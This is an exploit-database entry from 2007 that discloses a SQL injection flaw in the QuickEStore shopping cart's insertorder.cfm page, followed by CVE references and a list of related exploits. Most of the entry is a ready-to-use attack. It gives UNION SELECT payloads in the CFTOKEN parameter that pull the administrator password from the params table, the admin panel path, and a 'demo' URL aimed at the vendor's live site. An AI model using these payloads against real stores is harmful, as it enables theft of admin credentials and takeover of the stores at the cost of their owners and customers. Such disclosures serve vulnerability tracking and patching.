author:meoconx[at]vnbrain.net web application:QuickEStore Main Page:www.quickestore.com bug: sql injection at insertorder.cfm?CFID=123&CFTOKEN=1' exploit: http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1[sql query] get admin password: http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1 link admin:http://www.xxx.com/admin/ demo(main site :D :D): http://www.quickestore.com/ppec/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20params%22having%201=1 # milw0rm.com [2007-07-18]
Related Exploits
Trying to match CVEs (1): CVE-2007-3933Trying to match OSVDBs (1): 36358
Other Possible E-DB Search Terms: QuickEStore 8.2, QuickEStore
Date | D | V | Title | Author |
---|---|---|---|---|
2010-04-04 |
![]() |
QuickEStore 6.1 - Backup Dump | indoushka | |
2009-12-29 |
![]() |
QuickEStore 7.9 - SQL Injection / Full Path Disclosure Download | indoushka |